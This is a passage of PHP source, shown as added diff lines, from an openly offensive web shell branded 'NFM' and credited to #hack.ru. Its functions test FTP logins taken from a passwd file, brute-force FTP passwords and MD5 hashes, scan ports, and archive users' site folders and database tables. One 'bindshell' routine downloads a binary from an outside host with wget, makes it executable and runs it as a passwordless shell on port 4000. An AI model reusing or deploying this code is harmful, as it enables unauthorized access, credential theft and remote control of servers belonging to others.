(!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $conn_id=ftp_connect($ftp_server); + + if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) { + + + + $f=@fopen($HTTP_HOST,"a+"); + + fputs($f,"$g[1]:$g[1]\n"); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>"; + + + + ftp_close($conn_id); + + fclose($f); + + } else { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>"; + + } + + } + + } + +} + + + +function tar() { + + global $action, $filename; + + set_time_limit(0); + + echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. 
You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br> + +<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br> + +<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr> + +</table><br>"; + + + +$http_public="/public_html/"; + +$fpip = @fopen ($filename, "r"); + +if ($fpip) { + + while (!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $name=$g[1]; + + echo " + +<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<form method='get' action='$PHP_SELF' > + +<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr> + +<tr> + +<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td> + +<td valign=top><input type=submit value='GO' class=button1 $style_button></td> + +</tr></form></table>"; + + } + + } + +} + + + +# bindshell + +function bash() { + + global $action, $port_bind, $pass_key; + + + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr> + +</table><br>"; + + + +echo " + +<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b> Bindshell binary is situated in 
file called<u><i>s</i></u></b></td></tr>"; + + + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>"; + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>"; + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>"; + +# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>"; + +echo"</table>"; + + + + } + + + +function crypte() { + + global $action,$md5a,$sha1a,$crc32, $key,$string; + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). 
Also you may change your pass to NFM here.</blockquote></td></tr> + +</table>"; + + + +echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td> + + <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr> + + + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'> + + </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr> + + + + </form></table>"; + +echo 
" + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr> + + + + </form></table>"; + + + + } + + + +function decrypte() { + + global $action,$pass_de,$chars_de,$dat,$date; + +set_time_limit(0); + +ignore_user_abort(1); + + + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... 
So this is bruteforce.</blockquote></td></tr> + +</table>"; + + + +if($chars_de==""){$chars_de="";} + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Data decrypter:</b></td></tr> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr> + + <tr> + + <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td> + + <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td> + + <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font> + + <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a> + +<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a> + +<a class=menu href=javascript:ins('0123456789')>[0-9]</a> + +<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br> + +<font color=red><b><u>RUS:</u></b></font> + +<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a> + +<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a> + +</td></tr> + +<tr><td align=center width=400> + +<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button> + +</td></tr> + + + + </form></table>"; + + + + + 
+if($_POST[pass_de]){ + +$pass_de=htmlspecialchars($pass_de); + +$pass_de=stripslashes($pass_de); + +$dat=date("H:i:s"); + +$date=date("d:m:Y"); + + + +crack_md5(); + +} + +} + + + +function crack_md5() { + +global $chars_de; + +$chars=$_POST[chars]; + +set_time_limit(0); + +ignore_user_abort(1); + +$chars_de=str_replace("<",chr(60),$chars_de); + +$chars_de=str_replace(">",chr(62),$chars_de); + +$c=strlen($chars_de); + +for ($next = 0; $next <= 31; $next++) { + +for ($i1 = 0; $i1 <= $c; $i1++) { + +$word[1] = $chars_de{$i1}; + +for ($i2 = 0; $i2 <= $c; $i2++) { + +$word[2] = $chars_de{$i2}; + +if ($next <= 2) { + +result(implode($word)); + +}else { + +for ($i3 = 0; $i3 <= $c; $i3++) { + +$word[3] = $chars_de{$i3}; + +if ($next <= 3) { + +result(implode($word)); + +}else { + +for ($i4 = 0; $i4 <= $c; $i4++) { + +$word[4] = $chars_de{$i4}; + +if ($next <= 4) { + +result(implode($word)); + +}else { + +for ($i5 = 0; $i5 <= $c; $i5++) { + +$word[5] = $chars_de{$i5}; + +if ($next <= 5) { + +result(implode($word)); + +}else { + +for ($i6 = 0; $i6 <= $c; $i6++) { + +$word[6] = $chars_de{$i6}; + +if ($next <= 6) { + +result(implode($word)); + +}else { + +for ($i7 = 0; $i7 <= $c; $i7++) { + +$word[7] = $chars_de{$i7}; + +if ($next <= 7) { + +result(implode($word)); + +}else { + +for ($i8 = 0; $i8 <= $c; $i8++) { + +$word[8] = $chars_de{$i8}; + +if ($next <= 8) { + +result(implode($word)); + +}else { + +for ($i9 = 0; $i9 <= $c; $i9++) { + +$word[9] = $chars_de{$i9}; + +if ($next <= 9) { + +result(implode($word)); + +}else { + +for ($i10 = 0; $i10 <= $c; $i10++) { + +$word[10] = $chars_de{$i10}; + +if ($next <= 10) { + +result(implode($word)); + +}else { + +for ($i11 = 0; $i11 <= $c; $i11++) { + +$word[11] = $chars_de{$i11}; + +if ($next <= 11) { + +result(implode($word)); + +}else { + +for ($i12 = 0; $i12 <= $c; $i12++) { + +$word[12] = $chars_de{$i12}; + +if ($next <= 12) { + +result(implode($word)); + +}else { + +for ($i13 = 0; $i13 <= $c; $i13++) { + +$word[13] = 
$chars_de{$i13}; + +if ($next <= 13) { + +result(implode($word)); + +}else { + +for ($i14 = 0; $i14 <= $c; $i14++) { + +$word[14] = $chars_de{$i14}; + +if ($next <= 14) { + +result(implode($word)); + +}else { + +for ($i15 = 0; $i15 <= $c; $i15++) { + +$word[15] = $chars_de{$i15}; + +if ($next <= 15) { + +result(implode($word)); + +}else { + +for ($i16 = 0; $i16 <= $c; $i16++) { + +$word[16] = $chars_de{$i16}; + +if ($next <= 16) { + +result(implode($word)); + +}else { + +for ($i17 = 0; $i17 <= $c; $i17++) { + +$word[17] = $chars_de{$i17}; + +if ($next <= 17) { + +result(implode($word)); + +}else { + +for ($i18 = 0; $i18 <= $c; $i18++) { + +$word[18] = $chars_de{$i18}; + +if ($next <= 18) { + +result(implode($word)); + +}else { + +for ($i19 = 0; $i19 <= $c; $i19++) { + +$word[19] = $chars_de{$i19}; + +if ($next <= 19) { + +result(implode($word)); + +}else { + +for ($i20 = 0; $i20 <= $c; $i20++) { + +$word[20] = $chars_de{$i20}; + +if ($next <= 20) { + +result(implode($word)); + +}else { + +for ($i21 = 0; $i21 <= $c; $i21++) { + +$word[21] = $chars_de{$i21}; + +if ($next <= 21) { + +result(implode($word)); + +}else { + +for ($i22 = 0; $i22 <= $c; $i22++) { + +$word[22] = $chars_de{$i22}; + +if ($next <= 22) { + +result(implode($word)); + +}else { + +for ($i23 = 0; $i23 <= $c; $i23++) { + +$word[23] = $chars_de{$i23}; + +if ($next <= 23) { + +result(implode($word)); + +}else { + +for ($i24 = 0; $i24 <= $c; $i24++) { + +$word[24] = $chars_de{$i24}; + +if ($next <= 24) { + +result(implode($word)); + +}else { + +for ($i25 = 0; $i25 <= $c; $i25++) { + +$word[25] = $chars_de{$i25}; + +if ($next <= 25) { + +result(implode($word)); + +}else { + +for ($i26 = 0; $i26 <= $c; $i26++) { + +$word[26] = $chars_de{$i26}; + +if ($next <= 26) { + +result(implode($word)); + +}else { + +for ($i27 = 0; $i27 <= $c; $i27++) { + +$word[27] = $chars_de{$i27}; + +if ($next <= 27) { + +result(implode($word)); + +}else { + +for ($i28 = 0; $i28 <= $c; $i28++) { + +$word[28] = $chars_de{$i28}; + 
+if ($next <= 28) { + +result(implode($word)); + +}else { + +for ($i29 = 0; $i29 <= $c; $i29++) { + +$word[29] = $chars_de{$i29}; + +if ($next <= 29) { + +result(implode($word)); + +}else { + +for ($i30 = 0; $i30 <= $c; $i30++) { + +$word[30] = $chars_de{$i30}; + +if ($next <= 30) { + +result(implode($word)); + +}else { + +for ($i31 = 0; $i31 <= $c; $i31++) { + +$word[31] = $chars_de{$i31}; + +if ($next <= 31) { + +result(implode($word)); + + + +}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} + + + +function result($word) { + +global $dat,$date; + +$pass_de=$_POST[pass_de]; + +$dat2=date("H:i:s"); + +$date2=date("d:m:Y"); + + + +if(md5($word)==$pass_de){ + +print " + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr> + + <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr> + + <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr> + + <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr> + + <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file: <b>".$word."_md5</b></td></tr> + +</table> + + "; + + $f=@fopen($word._md5,"a+"); + + fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n "); + + exit;} + + + + + + + +} + + + +function brut_ftp() { + + global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka; + +set_time_limit(0); + +ignore_user_abort(1); + +echo "<br> + +<TABLE 
CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr> +<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr> + +</table>"; + + + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Brut FTP:</b></td></tr> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='host' size=50></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='login' size=50></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='chislo' size=10></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='proverka' 
size=50></td></tr> + +<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button> + +</td></tr> + + + + </form></table>"; + + + + + +function s() { + + $word="qwrtypsdfghjklzxcvbnm"; + + return $word[mt_rand(0,strlen($word)-1)]; + +} + + + +function g() { + + $word="euioam"; + + return $word[mt_rand(0,strlen($word)-2)]; + +} + + + +function name0() { return s().g().s(); } + +function name1() { return s().g().s().g(); } + +function name2() { return s().g().g().s(); } + +function name3() { return s().s().g().s().g(); } + +function name4() { return g().s().g().s().g(); } + +function name5() { return g().g().s().g().s(); } + +function name6() { return g().s().s().g().s(); } + +function name7() { return s().g().g().s().g(); } + +function name8() { return s().g().s().g().g(); } + +function name9() { return s().g().s().g().s().g(); } + +function name10() { return s().g().s().s().g().s().s(); } + +function name11() { return s().g().s().s().g().s().s().g(); } + + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); + +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + + + +function randword() { + + global $cool; + + $func="name".mt_rand(0,11); + + $func2="name".mt_rand(0,11); + + switch (mt_rand(0,11)) { + + case 0: return $func().mt_rand(5,99); + + case 1: return $func()."-".$func2(); + + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + + case 3: return $func()."!".$func(); + + case 4: return randpass(mt_rand(5,12)); + + default: return $func(); + + } + + + + + +} + + 
+ +function randpass($len) { + + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + + $s=""; + + for ($i=0; $i<$len; $i++) { + + $s.=$word[mt_rand(0,strlen($word)-1)]; + + } + + return $s; + +} + +if (@unlink("pass.txt") < 0){ + +echo "nothing"; + +exit; + +} + +$file="pass.txt"; + +if($file && $host && $login){ + + $cn=mt_rand(30,30); + +for ($i=0; $i<$cn; $i++) { + + $s=$cool2[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$s\n"); + + } + + + + $cnt2=mt_rand(43,43); + +for ($i=0; $i<$cnt2; $i++) { + + $r=$cool[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$login$r\n"); + +} + +$p="$proverka"; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$p\n"); + + + + $cnt3=mt_rand($chislo,$chislo); + + for ($i=0; $i<$cnt3; $i++) { + + $u=randword(); + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$u\n"); + + } + + + + if(is_file($file)){ + + $passwd=file($file,1000); + + for($i=0; $i<count($passwd); $i++){ + + $stop=false; + + $password=trim($passwd[$i]); + + $open_ftp=@fsockopen($host,21); + + if($open_ftp!=false){ + + fputs($open_ftp,"user $login\n"); + + fputs($open_ftp,"pass $password\n"); + + while(!feof($open_ftp) && $stop!=true){ + + $text=fgets($open_ftp,4096); + + if(preg_match("/230/",$text)){ + + $stop=true; + + $f=@fopen($host._ftp,"a+"); + + fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n "); + + + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! 
Password is known now.</font></b><br> + +&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table> + +";exit; + + } + + elseif(preg_match("/530/",$text)){ + + $stop=true; + + + + } + + } + + fclose($open_ftp); + + }else{ + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr> + +</table> + +";exit; + + } + + } + + } + +} + + + +} + + + +# port scanner + +function portscan() { + + global $action,$portscan,$port,$HTTP_HOST,$min,$max; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time1 = $mtime; + + + + $id = $HTTP_HOST; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . 
"...<br></td></tr></table>"; + + + + $lport = $min; + + $hport = $max; + + $op = 0; + + $gp = 0; + + + + for ($porta=$lport; $porta<=$hport; $porta++) { + + $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); + + if ( !$fp ) { $gp++; } + + else { + + $port_addres = $port[$porta]; + + if($port_addres == "") $port_addres = "unknown"; + + $serv = getservbyport($porta, TCP); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>"; + + $op++; + + } + + } + + + + if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>"; + + + + $unsi = ($op/$porta)*100; + + $unsi = round($unsi); + + + + echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>"; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time2 = $mtime; + + $loadtime = ($time2 - $time1); + + $loadtime = round($loadtime, 2); + + + + echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>"; + +} + + 
+ +function nfm_copyright() { + +global $action,$upass,$uname,$nfm; + + return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>"; + + + +} + +// =-=-=-=-= SQL MODULE =-=-=-=-= + +// SQL functions start + +function aff_date() { + + $date_now=date("F j,Y,g:i a"); + + return $date_now; + +} + + + +function sqldumptable($table) { + + global $sv_s,$sv_d,$drp_tbl; + + $tabledump = ""; + + if ($sv_s) { + + if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } + + $tabledump.="CREATE TABLE $table (\n"; + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $tabledump.=",\n"; } + + else { $firstfield=0;} + + $tabledump.=" $champ[Field] $champ[Type]"; + + if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} + + if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} + + if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";} + + } + + + + @mysql_free_result($champs); + + $keys=mysql_query("SHOW KEYS FROM $table"); + + while ($key=mysql_fetch_array($keys)) { + + $kname=$key['Key_name']; + + if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";} + + if(!is_array($index[$kname])) { $index[$kname]=array();} + + $index[$kname][]=$key['Column_name']; + + } + + + + @mysql_free_result($keys); + + while(list($kname,$columns)=@each($index)) { + + $tabledump.=",\n"; + + $colnames=implode($columns,","); + + if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";} + + else { + + if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);} + + $tabledump.=" KEY $kname ($colnames)"; + + } + + } + + $tabledump.="\n);\n\n"; + + } + + + + if ($sv_d) { + + 
$rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $tabledump.="INSERT INTO $table VALUES("; + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $tabledump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) {$tabledump.="NULL";} + + else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";} + + } + + $tabledump.=");\n"; + + } + + @mysql_free_result($rows); + + } + + + + return $tabledump; + +} + + + +function csvdumptable($table) { + + global $sv_s,$sv_d; + + $csvdump="## Table:$table \n\n"; + + if ($sv_s) { + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + $csvdump.="'".$champ['Field']."'"; + + } + + + + @mysql_free_result($champs); + + $csvdump.="\n"; + + } + + + + if ($sv_d) { + + $rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) { $csvdump.="NULL";} + + else { $csvdump.="'".addslashes($row[$cptchamp])."'";} + + } + + $csvdump.="\n"; + + } + + } + + + + @mysql_free_result($rows); + + return $csvdump; + +} + + + +function write_file($data) { + + global $g_fp,$file_type; + + if ($file_type==1) { gzwrite($g_fp,$data); } + + else { fwrite ($g_fp,$data); } + +} + + + +function open_file($file_name) { + + global $g_fp,$file_type,$dbbase,$f_nm; + + if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } + + else { $g_fp=fopen ($file_name,"w"); } + + + + $f_nm[]=$file_name; + + $data=""; + + $data.="##\n"; + + $data.="## NFM hack.ru creator \n"; + + $data.="##-------------------------\n"; + + $data.="## Date:".aff_date()."\n"; + + $data.="## 
